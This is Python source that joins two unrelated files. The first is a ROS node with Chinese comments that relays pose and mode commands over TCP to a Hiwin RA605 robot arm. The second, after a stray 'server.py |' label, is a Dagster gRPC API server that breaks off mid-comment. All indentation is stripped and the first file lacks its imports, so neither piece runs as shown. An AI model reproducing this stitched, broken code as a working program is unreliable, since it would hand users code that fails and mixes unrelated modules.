from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#if Arm_feedback == 0:
if point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True:
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line |
server.py | import math
import multiprocessing
import os
import queue
import sys
import threading
import time
import uuid
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
from typing import NamedTuple
import grpc
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import ReconstructableRepository
from dagster.core.errors import DagsterUserCodeUnreachableError
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.origin import DEFAULT_DAGSTER_ENTRY_POINT, get_python_environment_entry_point
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.utils import find_free_port, frozenlist, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets, max_rx_bytes, max_send_bytes
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class LoadedRepositories:
def __init__(self, loadable_target_origin, entry_point):
self._loadable_target_origin = loadable_target_origin
self._code_pointers_by_repo_name = {}
self._recon_repos_by_name = {}
self._loadable_repository_symbols = []
if not loadable_target_origin:
return
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
for loadable_target in loadable_targets:
pointer = _get_code_pointer(loadable_target_origin, loadable_target)
recon_repo = ReconstructableRepository(
pointer,
_get_current_image(),
sys.executable,
entry_point=entry_point,
)
repo_def = recon_repo.get_definition()
# force load of all lazy constructed jobs/pipelines
repo_def.get_all_pipelines()
self._code_pointers_by_repo_name[repo_def.name] = pointer
self._recon_repos_by_name[repo_def.name] = recon_repo
self._loadable_repository_symbols.append(
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repo_def.name,
)
)
@property
def loadable_repository_symbols(self):
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
return self._code_pointers_by_repo_name
def get_recon_repo(self, name: str) -> ReconstructableRepository:
return self._recon_repos_by_name[name]
def _get_code_pointer(loadable_target_origin, loadable_repository_symbol):
if loadable_target_origin.python_file:
return CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
return CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
else:
return CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
class DagsterApiServer(DagsterApiServicer):
# The loadable_target_origin is currently Noneable to support instaniating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
entry_point=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
self._mp_ctx = multiprocessing.get_context("spawn")
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
# Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
# hearbeat, at which point this event is set. The cleanup thread will then set the server
# termination event once all current executions have finished, which will stop the server)
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._serializable_load_error = None
self._entry_point = (
frozenlist(check.list_param(entry_point, "entry_point", of_type=str))
if entry_point != None
else DEFAULT_DAGSTER_ENTRY_POINT
)
try:
self._loaded_repositories = LoadedRepositories(
loadable_target_origin, self._entry_point
)
except Exception:
if not lazy_load_user_code:
raise
self._loaded_repositories = None
self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
f"Run execution process for {run.run_id} unexpectedly "
f"exited with exit code {process.exitcode}."
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(
self, external_repository_origin: ExternalRepositoryOrigin
) -> ReconstructableRepository:
# could assert against external_repository_origin.repository_location_origin
return self._loaded_repositories.get_recon_repo(external_repository_origin.repository_name)
def _recon_pipeline_from_origin(self, external_pipeline_origin: ExternalPipelineOrigin):
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
if self._serializable_load_error:
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
self._serializable_load_error
)
)
response = ListRepositoriesResponse(
self._loaded_repositories.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=self._loaded_repositories.code_pointers_by_repo_name,
entry_point=self._entry_point,
)
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalNotebookData(self, request, _context):
notebook_path = request.notebook_path
check.str_param(notebook_path, "notebook_path")
return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_data = serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_data)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
)
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def _split_serialized_data_into_chunk_events(self, serialized_data):
num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_data),
)
yield api_pb2.StreamingChunkEvent(
sequence_number=i,
serialized_chunk=serialized_data[start_index:end_index],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_schedule_data = serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_sensor_data = serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
args.cursor,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except:
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except:
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except:
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = self._mp_ctx.Queue()
termination_event = self._mp_ctx.Event()
execution_process = self._mp_ctx.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=_get_current_image(), serializable_error_info=None
)
)
)
def _get_current_image():
return os.getenv("DAGSTER_CURRENT_IMAGE")
@whitelist_for_serdes
class GrpcServerStartedEvent(NamedTuple("_GrpcServerStartedEvent", [])):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(NamedTuple("_GrpcServerFailedToBindEvent", [])):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(
NamedTuple("GrpcServerLoadErrorEvent", [("error_info", SerializableErrorInfo)])
):
def __new__(cls, error_info: SerializableErrorInfo):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
entry_point=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(
ThreadPoolExecutor(max_workers=max_workers),
compression=grpc.Compression.Gzip,
options=[
("grpc.max_send_message_length", max_send_bytes()),
("grpc.max_receive_message_length", max_rx_bytes()),
],
)
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
entry_point=entry_point,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
